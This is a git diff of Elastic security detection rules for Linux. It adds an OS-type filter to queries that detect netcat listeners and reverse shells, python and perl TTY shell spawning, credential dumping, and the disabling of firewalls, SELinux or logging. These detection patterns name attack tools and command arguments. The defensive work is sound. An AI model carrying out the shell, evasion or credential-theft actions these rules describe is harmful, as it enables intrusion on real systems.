diff --git a/rules/linux/command_and_control_connection_attempt_by_non_ssh_root_session.toml b/rules/linux/command_and_control_connection_attempt_by_non_ssh_root_session.toml index f953beb12..824829a24 100644 --- a/rules/linux/command_and_control_connection_attempt_by_non_ssh_root_session.toml +++ b/rules/linux/command_and_control_connection_attempt_by_non_ssh_root_session.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -45,9 +45,9 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan=1m -[network where event.type == "start" and event.action == "connection_attempted" and user.id == "0" and +[network where host.os.type == "linux" and event.type == "start" and event.action == "connection_attempted" and user.id == "0" and not process.executable : ("/bin/ssh", "/sbin/ssh", "/usr/lib/systemd/systemd", "/usr/sbin/sshd")] -[process where event.action == "session_id_change" and user.id == "0" and +[process where host.os.type == "linux" and event.action == "session_id_change" and user.id == "0" and not process.executable : ("/bin/ssh", "/sbin/ssh", "/usr/lib/systemd/systemd", "/usr/sbin/sshd")] ''' diff --git a/rules/linux/command_and_control_linux_iodine_activity.toml b/rules/linux/command_and_control_linux_iodine_activity.toml index 5295985b0..52cdcb741 100644 --- a/rules/linux/command_and_control_linux_iodine_activity.toml +++ b/rules/linux/command_and_control_linux_iodine_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/19" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and process.name:(iodine or iodined) +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:(iodine or iodined) ''' diff --git a/rules/linux/command_and_control_tunneling_via_earthworm.toml b/rules/linux/command_and_control_tunneling_via_earthworm.toml index 1e77040e6..683f35768 100644 --- a/rules/linux/command_and_control_tunneling_via_earthworm.toml +++ b/rules/linux/command_and_control_tunneling_via_earthworm.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "linux" and event.type == "start" and process.args : "-s" and process.args : "-d" and process.args : "rssocks" ''' diff --git a/rules/linux/credential_access_bruteforce_password_guessing.toml b/rules/linux/credential_access_bruteforce_password_guessing.toml index 650ff7723..ad0e3842e 100644 --- a/rules/linux/credential_access_bruteforce_password_guessing.toml +++ b/rules/linux/credential_access_bruteforce_password_guessing.toml @@ -4,7 +4,7 @@ integration = ["system"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -54,10 +54,10 @@ tags = ["Elastic", "Host", "Linux", "Threat Detection", "Credential Access"] type = "eql" query = ''' sequence by host.id, source.ip, user.name with maxspan=3s - [authentication where event.action in ("ssh_login", "user_login") and + [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and event.outcome == "failure" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" ] with runs=2 - [authentication where event.action in ("ssh_login", "user_login") and + [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and event.outcome == "success" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" ] ''' diff --git a/rules/linux/credential_access_collection_sensitive_files.toml b/rules/linux/credential_access_collection_sensitive_files.toml index d1d38b33a..0d512ee7f 100644 --- a/rules/linux/credential_access_collection_sensitive_files.toml +++ b/rules/linux/credential_access_collection_sensitive_files.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:start and +event.category:process and host.os.type:linux and event.type:start and process.name:(zip or tar or gzip or hdiutil or 7z) and process.args: ( diff --git a/rules/linux/credential_access_credential_dumping.toml b/rules/linux/credential_access_credential_dumping.toml index 87e80fb88..d795d5d6b 100644 --- a/rules/linux/credential_access_credential_dumping.toml +++ b/rules/linux/credential_access_credential_dumping.toml @@ -31,7 +31,7 @@ tags = ["Elastic", "Elastic Endgame", "Host", "Linux", "Threat Detection", "Cred timestamp_override = "event.ingested" type = "eql" query = ''' -process where process.name == "unshadow" and +process where host.os.type == "linux" and process.name == "unshadow" and event.type == "start" and event.action == "exec" and process.args_count >= 2 ''' diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce.toml index cf8ad0e1f..d0fbf183b 100644 --- a/rules/linux/credential_access_potential_linux_ssh_bruteforce.toml +++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce.toml @@ -4,7 +4,7 @@ integration = ["system"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -54,7 +54,7 @@ tags = ["Elastic", "Host", "Linux", "Threat Detection", "Credential Access"] type = "eql" query = ''' sequence by host.id, source.ip, user.name with maxspan=10s - [authentication where event.action in ("ssh_login", "user_login") and + [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and event.outcome == "failure" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" ] with runs=10 ''' diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce_root.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce_root.toml index bf9d7931f..e0d797103 100644 --- a/rules/linux/credential_access_potential_linux_ssh_bruteforce_root.toml +++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce_root.toml @@ -4,7 +4,7 @@ integration = ["system"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -54,7 +54,7 @@ tags = ["Elastic", "Host", "Linux", "Threat Detection", "Lateral Movement", "Cre type = "eql" query = ''' sequence by host.id, source.ip with maxspan=10s - [authentication where event.action in ("ssh_login", "user_login") and + [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and event.outcome == "failure" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" and user.name in ("*root*" , "*admin*")] with runs=3 ''' diff --git a/rules/linux/credential_access_ssh_backdoor_log.toml b/rules/linux/credential_access_ssh_backdoor_log.toml index c234ca9f7..11f78c920 100644 --- a/rules/linux/credential_access_ssh_backdoor_log.toml +++ b/rules/linux/credential_access_ssh_backdoor_log.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -35,7 +35,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "change" and process.executable : ("/usr/sbin/sshd", "/usr/bin/ssh") and +file where host.os.type == "linux" and event.type == "change" and process.executable : ("/usr/sbin/sshd", "/usr/bin/ssh") and ( (file.name : (".*", "~*", "*~") and not file.name : (".cache", ".viminfo", ".bash_history")) or file.extension : ("in", "out", "ini", "h", "gz", "so", "sock", "sync", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9") or diff --git a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml index 98e5de2b4..c0e73e5b0 100644 --- a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml +++ b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml @@ -24,7 +24,7 @@ tags = ["Elastic", "Host", "Linux", "Threat Detection", "Defense Evasion"] timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and event.action == "exec" and +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( /* disable FW */ ( diff --git a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml index 2cca08b51..49ca2656b 100644 --- a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml +++ b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:linux and event.type:(start or process_started) and ((process.name:service and process.args:stop) or (process.name:chkconfig and process.args:off) or (process.name:systemctl and process.args:(disable or stop or kill))) diff --git a/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml b/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml index 3f9c6f11c..783c23e1d 100644 --- a/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml +++ b/rules/linux/defense_evasion_base16_or_base32_encoding_or_decoding_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:(base16 or base32 or base32plain or base32hex) ''' diff --git a/rules/linux/defense_evasion_chattr_immutable_file.toml b/rules/linux/defense_evasion_chattr_immutable_file.toml index 916452cb0..7e8ea0e16 100644 --- a/rules/linux/defense_evasion_chattr_immutable_file.toml +++ b/rules/linux/defense_evasion_chattr_immutable_file.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,9 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and user.name == "root" and process.executable : "/usr/bin/chattr" and process.args : ("-*i*", "+*i*") and not process.parent.executable: "/lib/systemd/systemd" +process where host.os.type == "linux" and event.type == "start" and user.name == "root" and + process.executable : "/usr/bin/chattr" and process.args : ("-*i*", "+*i*") and + not process.parent.executable: "/lib/systemd/systemd" ''' diff --git a/rules/linux/defense_evasion_disable_selinux_attempt.toml b/rules/linux/defense_evasion_disable_selinux_attempt.toml index 249f59e72..ed3f1ae20 100644 --- a/rules/linux/defense_evasion_disable_selinux_attempt.toml +++ b/rules/linux/defense_evasion_disable_selinux_attempt.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and process.name:setenforce and process.args:0 +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:setenforce and process.args:0 ''' diff --git a/rules/linux/defense_evasion_file_deletion_via_shred.toml b/rules/linux/defense_evasion_file_deletion_via_shred.toml index fe248183b..3bea31c1c 100644 --- a/rules/linux/defense_evasion_file_deletion_via_shred.toml +++ b/rules/linux/defense_evasion_file_deletion_via_shred.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and process.name:shred and +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:shred and process.args:("-u" or "--remove" or "-z" or "--zero") ''' diff --git a/rules/linux/defense_evasion_file_mod_writable_dir.toml b/rules/linux/defense_evasion_file_mod_writable_dir.toml index afd1562ab..e2a48988f 100644 --- a/rules/linux/defense_evasion_file_mod_writable_dir.toml +++ b/rules/linux/defense_evasion_file_mod_writable_dir.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:(chmod or chown or chattr or chgrp) and process.working_directory:(/tmp or /var/tmp or /dev/shm) and not user.name:root diff --git a/rules/linux/defense_evasion_hidden_file_dir_tmp.toml b/rules/linux/defense_evasion_hidden_file_dir_tmp.toml index 22b85beb7..e26d2f500 100644 --- a/rules/linux/defense_evasion_hidden_file_dir_tmp.toml +++ b/rules/linux/defense_evasion_hidden_file_dir_tmp.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -37,7 +37,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type in ("start", "process_started") and +process where host.os.type == "linux" and event.type in ("start", "process_started") and process.working_directory in ("/tmp", "/var/tmp", "/dev/shm") and process.args regex~ """\.[a-z0-9_\-][a-z0-9_\-\.]{1,254}""" and not process.name in ("ls", "find", "grep") diff --git a/rules/linux/defense_evasion_hidden_shared_object.toml b/rules/linux/defense_evasion_hidden_shared_object.toml index 1619d489f..383e2e322 100644 --- a/rules/linux/defense_evasion_hidden_shared_object.toml +++ b/rules/linux/defense_evasion_hidden_shared_object.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type : "creation" and file.extension == "so" and file.name : ".*.so" +file where host.os.type == "linux" and event.type == "creation" and file.extension == "so" and file.name : ".*.so" ''' diff --git a/rules/linux/defense_evasion_kernel_module_removal.toml b/rules/linux/defense_evasion_kernel_module_removal.toml index 69ce7613c..fe176fc44 100644 --- a/rules/linux/defense_evasion_kernel_module_removal.toml +++ b/rules/linux/defense_evasion_kernel_module_removal.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.args:((rmmod and sudo) or (modprobe and sudo and ("--remove" or "-r"))) ''' diff --git a/rules/linux/defense_evasion_log_files_deleted.toml b/rules/linux/defense_evasion_log_files_deleted.toml index 13129f267..04610acf7 100644 --- a/rules/linux/defense_evasion_log_files_deleted.toml +++ b/rules/linux/defense_evasion_log_files_deleted.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "deletion" and +file where host.os.type == "linux" and event.type == "deletion" and file.path : ( "/var/run/utmp", diff --git a/rules/linux/discovery_kernel_module_enumeration.toml b/rules/linux/discovery_kernel_module_enumeration.toml index 7c9eef621..4324996a4 100644 --- a/rules/linux/discovery_kernel_module_enumeration.toml +++ b/rules/linux/discovery_kernel_module_enumeration.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.args:(kmod and list and sudo or sudo and (depmod or lsmod or modinfo)) ''' diff --git a/rules/linux/discovery_linux_hping_activity.toml b/rules/linux/discovery_linux_hping_activity.toml index 7b7521c28..2287687cd 100644 --- a/rules/linux/discovery_linux_hping_activity.toml +++ b/rules/linux/discovery_linux_hping_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and process.name:(hping or hping2 or hping3) +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:(hping or hping2 or hping3) ''' diff --git a/rules/linux/discovery_linux_nping_activity.toml b/rules/linux/discovery_linux_nping_activity.toml index 98d731e82..501d93685 100644 --- a/rules/linux/discovery_linux_nping_activity.toml +++ b/rules/linux/discovery_linux_nping_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and process.name:nping +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:nping ''' diff --git a/rules/linux/discovery_virtual_machine_fingerprinting.toml b/rules/linux/discovery_virtual_machine_fingerprinting.toml index e0c221291..faa8bb43d 100644 --- a/rules/linux/discovery_virtual_machine_fingerprinting.toml +++ b/rules/linux/discovery_virtual_machine_fingerprinting.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.args:("/sys/class/dmi/id/bios_version" or "/sys/class/dmi/id/product_name" or "/sys/class/dmi/id/chassis_vendor" or diff --git a/rules/linux/execution_abnormal_process_id_file_created.toml b/rules/linux/execution_abnormal_process_id_file_created.toml index b067db9a5..9a4129e55 100644 --- a/rules/linux/execution_abnormal_process_id_file_created.toml +++ b/rules/linux/execution_abnormal_process_id_file_created.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -80,7 +80,7 @@ type = "eql" query = ''' /* add file size filters when data is available */ -file where event.type == "creation" and user.id == "0" and +file where host.os.type == "linux" and event.type == "creation" and user.id == "0" and file.path regex~ """/var/run/\w+\.(pid|lock|reboot)""" and file.extension in ("pid","lock","reboot") and /* handle common legitimate files */ diff --git a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml index e53426a10..42bfba2ae 100644 --- a/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml +++ b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/19" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -79,7 +79,7 @@ type = "eql" query = ''' sequence by process.entity_id - [process where event.type == "start" and + [process where host.os.type == "linux" and event.type == "start" and process.name:("nc","ncat","netcat","netcat.openbsd","netcat.traditional") and ( /* bind shell to echo for command execution */ (process.args:("-l","-p") and process.args:("-c","echo","$*")) @@ -92,7 +92,7 @@ sequence by process.entity_id /* file transfer via pipe */ or (process.args:("|") and process.args:("nc","ncat")) )] - [network where (process.name == "nc" or process.name == "ncat" or process.name == "netcat" or + [network where host.os.type == "linux" and (process.name == "nc" or process.name == "ncat" or process.name == "netcat" or process.name == "netcat.openbsd" or process.name == "netcat.traditional")] ''' diff --git a/rules/linux/execution_perl_tty_shell.toml b/rules/linux/execution_perl_tty_shell.toml index 84e761a4f..9bb038d4c 100644 --- a/rules/linux/execution_perl_tty_shell.toml +++ b/rules/linux/execution_perl_tty_shell.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and process.name:perl and +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:perl and process.args:("exec \"/bin/sh\";" or "exec \"/bin/dash\";" or "exec \"/bin/bash\";") ''' diff --git a/rules/linux/execution_process_started_from_process_id_file.toml b/rules/linux/execution_process_started_from_process_id_file.toml index 91afb7474..660b9bc2f 100644 --- a/rules/linux/execution_process_started_from_process_id_file.toml +++ b/rules/linux/execution_process_started_from_process_id_file.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -46,7 +46,8 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and user.id == "0" and process.executable regex~ """/var/run/\w+\.(pid|lock|reboot)""" +process where host.os.type == "linux" and event.type == "start" and user.id == "0" and + process.executable regex~ """/var/run/\w+\.(pid|lock|reboot)""" ''' diff --git a/rules/linux/execution_process_started_in_shared_memory_directory.toml b/rules/linux/execution_process_started_in_shared_memory_directory.toml index 32beb52ab..5183bae40 100644 --- a/rules/linux/execution_process_started_in_shared_memory_directory.toml +++ b/rules/linux/execution_process_started_in_shared_memory_directory.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -38,7 +38,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "linux" and event.type == "start" and event.action : ("exec", "exec_event") and user.name == "root" and process.executable : ( "/dev/shm/*", diff --git a/rules/linux/execution_python_tty_shell.toml b/rules/linux/execution_python_tty_shell.toml index 7dafdaba3..4ec571c7d 100644 --- a/rules/linux/execution_python_tty_shell.toml +++ b/rules/linux/execution_python_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/15" integration = ["endpoint"] maturity = "production" -updated_date = "2022/12/20" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category:process and event.type:(start or process_started) and +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:python* and process.args:("import pty; pty.spawn(\"/bin/sh\")" or "import pty; pty.spawn(\"/bin/dash\")" or diff --git a/rules/linux/execution_reverse_shell_via_named_pipe.toml b/rules/linux/execution_reverse_shell_via_named_pipe.toml index 6ccabe46d..a6fd00e19 100644 --- a/rules/linux/execution_reverse_shell_via_named_pipe.toml +++ b/rules/linux/execution_reverse_shell_via_named_pipe.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -39,10 +39,10 @@ type = "eql" query = ''' sequence by host.id with maxspan = 5s - [process where event.type == "start" and process.executable : ("/usr/bin/mkfifo","/usr/bin/mknod") and process.args:("/tmp/*","$*")] - [process where process.executable : ("/bin/sh","/bin/bash") and process.args:("-i") or + [process where host.os.type == "linux" and event.type == "start" and process.executable : ("/usr/bin/mkfifo","/usr/bin/mknod") and process.args:("/tmp/*","$*")] + [process where host.os.type == "linux" and process.executable : ("/bin/sh","/bin/bash") and process.args:("-i") or (process.executable: ("/usr/bin/openssl") and process.args: ("-connect"))] - [process where (process.name:("nc","ncat","netcat","netcat.openbsd","netcat.traditional") or + [process where host.os.type == "linux" and (process.name:("nc","ncat","netcat","netcat.openbsd","netcat.traditional") or (process.name: "openssl" and process.executable: "/usr/bin/openssl"))] ''' diff --git a/rules/linux/execution_shell_evasion_linux_binary.toml b/rules/linux/execution_shell_evasion_linux_binary.toml index 13c902745..9d416f247 100644 --- a/rules/linux/execution_shell_evasion_linux_binary.toml +++ b/rules/linux/execution_shell_evasion_linux_binary.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/19" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -102,7 +102,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "linux" and event.type == "start" and ( /* launch shells from unusual process */ (process.name == "capsh" and process.args == "--") or diff --git a/rules/linux/execution_tc_bpf_filter.toml b/rules/linux/execution_tc_bpf_filter.toml index 0dda8bb65..1b0f53152 100644 --- a/rules/linux/execution_tc_bpf_filter.toml +++ b/rules/linux/execution_tc_bpf_filter.toml @@ -3,7 +3,7 @@ creation_date = "2022/07/11" maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" integration = ["endpoint"] [rule] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type != "end" and process.executable : "/usr/sbin/tc" and process.args : "filter" and process.args : "add" and process.args : "bpf" and not process.parent.executable: "/usr/sbin/libvirtd" +process where host.os.type == "linux" and event.type != "end" and process.executable : "/usr/sbin/tc" and process.args : "filter" and process.args : "add" and process.args : "bpf" and not process.parent.executable: "/usr/sbin/libvirtd" ''' [[rule.threat]] diff --git a/rules/linux/impact_process_kill_threshold.toml b/rules/linux/impact_process_kill_threshold.toml index 0094932a3..6a05ba18b 100644 --- a/rules/linux/impact_process_kill_threshold.toml +++ b/rules/linux/impact_process_kill_threshold.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/20" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -54,7 +54,7 @@ tags = ["Elastic", "Host", "Linux", "Threat Detection", "Impact", "Investigation type = "threshold" query = ''' -event.category:process and event.type:start and process.name:"pkill" and process.args:"-f" +event.category:process and host.os.type:linux and event.type:start and process.name:"pkill" and process.args:"-f" ''' diff --git a/rules/linux/lateral_movement_telnet_network_activity_external.toml b/rules/linux/lateral_movement_telnet_network_activity_external.toml index 2064ee16b..d8141aa84 100644 --- a/rules/linux/lateral_movement_telnet_network_activity_external.toml +++ b/rules/linux/lateral_movement_telnet_network_activity_external.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,8 +34,8 @@ type = "eql" query = ''' sequence by process.entity_id - [process where process.name == "telnet" and event.type == "start"] - [network where process.name == "telnet" and + [process where host.os.type == "linux" and process.name == "telnet" and event.type == "start"] + [network where host.os.type == "linux" and process.name == "telnet" and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", diff --git a/rules/linux/lateral_movement_telnet_network_activity_internal.toml b/rules/linux/lateral_movement_telnet_network_activity_internal.toml index aa0b69868..7c688d19d 100644 --- a/rules/linux/lateral_movement_telnet_network_activity_internal.toml +++ b/rules/linux/lateral_movement_telnet_network_activity_internal.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,8 +34,8 @@ type = "eql" query = ''' sequence by process.entity_id - [process where process.name == "telnet" and event.type == "start"] - [network where process.name == "telnet" and 